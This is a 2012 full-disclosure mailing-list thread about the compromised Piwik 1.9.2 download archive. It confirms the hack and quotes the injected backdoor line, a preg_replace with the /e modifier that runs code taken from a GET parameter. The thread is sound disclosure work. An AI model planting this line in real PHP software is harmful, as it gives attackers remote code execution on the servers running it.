
Date: Tue, 27 Nov 2012 09:47:19 -0300
From: Felipe Montecino <ksha@...m.cl>
To: Christian Sciberras <uuf6429@...il.com>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: Possible infection of Piwik 1.9.2 download
	archive

Confirmed

http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
El 27/11/2012 08:56, "Christian Sciberras" <uuf6429@...il.com> escribió:

> > At the moment I'm trying to figure out the further sense of this code,
> > but it seems that there might also be some kind of backdoor (because of
> > the use of $_GET).
>
>
> preg_replace("/(.+)/e", $_GET['g'], 'dwm');
>
> You think?
>
>
> Chris.
>
>
> On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <
> max@...becker-wtal.de> wrote:
>
>> preg_replace("/(.+)/e", $_GET['g'], 'dwm');
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
